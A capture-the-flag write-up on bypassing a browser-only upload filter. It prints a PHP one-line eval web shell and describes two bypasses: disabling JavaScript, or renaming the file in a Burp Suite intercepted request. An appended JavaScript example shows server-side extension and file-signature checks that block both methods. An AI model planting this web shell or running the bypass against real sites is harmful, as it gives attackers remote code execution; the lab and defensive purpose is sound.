CTFHub: File upload (JS front-end verification)
1. One-sentence Trojan horse
The file name is hack.php
<?php @eval($_POST['123']); ?>
2. The idea behind the two methods
When we upload a file, the client-side JavaScript checks the file type and only allows files ending in ".jpg", ".png" and ".gif" to be uploaded.
Method 1. Turn off JavaScript so that the front-end verification never runs; the one-sentence Trojan horse can then be uploaded directly.
Method 2. Change the suffix of the one-sentence Trojan horse to a type the verification allows, then capture the request with Burp Suite and modify it.
3. Method one steps
Firefox: open about:config (advanced preferences) and turn off JavaScript.
With JavaScript turned off, there is no restriction on the file upload type.
You can upload hack.php directly and use Ant Sword or hackbar to get the flag.
4. Method two steps
Rename the one-sentence Trojan horse from hack.php to hack.jpg.
Set the browser proxy to 127.0.0.1:8080.
Turn on request interception in Burp Suite.
Intercept the upload request, change the suffix of hack.jpg back to hack.php, and then forward it (Forward).
The upload succeeds...
Get the flag...
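Both methods work because the only check runs in the browser, so the fix is to repeat the check on the server against the request that actually arrived. The following is an added example, not code from the original write-up or from the challenge; the function names and sample bytes are constructed for illustration.

```javascript
// Added example: names and sample bytes below are constructed, not from the challenge.
// Allowed types from the write-up (.jpg, .png, .gif) with the bytes such files start with.
const ALLOWED = new Map([
  ["jpg", [[0xff, 0xd8, 0xff]]],
  ["png", [[0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]]],
  ["gif", [[0x47, 0x49, 0x46, 0x38, 0x37, 0x61], [0x47, 0x49, 0x46, 0x38, 0x39, 0x61]]],
]);

// What the browser-side script does: an extension test that only runs if
// JavaScript is enabled and only sees the name the file had before the request was sent.
function clientSideCheck(filename) {
  return /\.(jpg|png|gif)$/i.test(filename);
}

function startsWith(bytes, sig) {
  return bytes.length >= sig.length && sig.every((b, i) => bytes[i] === b);
}

// Server-side check: applied to the filename and body that actually arrived.
function serverSideCheck(filename, bytes) {
  const dot = filename.lastIndexOf(".");
  const ext = dot < 0 ? "" : filename.slice(dot + 1).toLowerCase();
  const sigs = ALLOWED.get(ext); // Map lookup: no prototype keys such as "constructor"
  if (!sigs) return { ok: false, reason: "extension not allowed" };
  if (!sigs.some((sig) => startsWith(bytes, sig))) {
    return { ok: false, reason: "content does not match extension" };
  }
  // The server picks the stored extension; the client-supplied name is not reused.
  return { ok: true, storedExt: ext };
}

// Constructed sample bodies.
const PHP_BYTES = new TextEncoder().encode("<?php /* constructed sample body */ ?>");
const PNG_BYTES = Uint8Array.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0, 0, 0, 13]);

function demo() {
  return [
    ["hack.php", PHP_BYTES], // JavaScript disabled, or name edited in the proxy
    ["hack.jpg", PHP_BYTES], // renamed file, before the name is changed back
    ["cat.png", PNG_BYTES],  // ordinary image
  ].map(([name, body]) => ({ name, client: clientSideCheck(name), server: serverSideCheck(name, body) }));
}

console.log(JSON.stringify(demo(), null, 2));
```

The signature comparison is defense in depth; the extension allow-list enforced on the server is what rejects the request from either method.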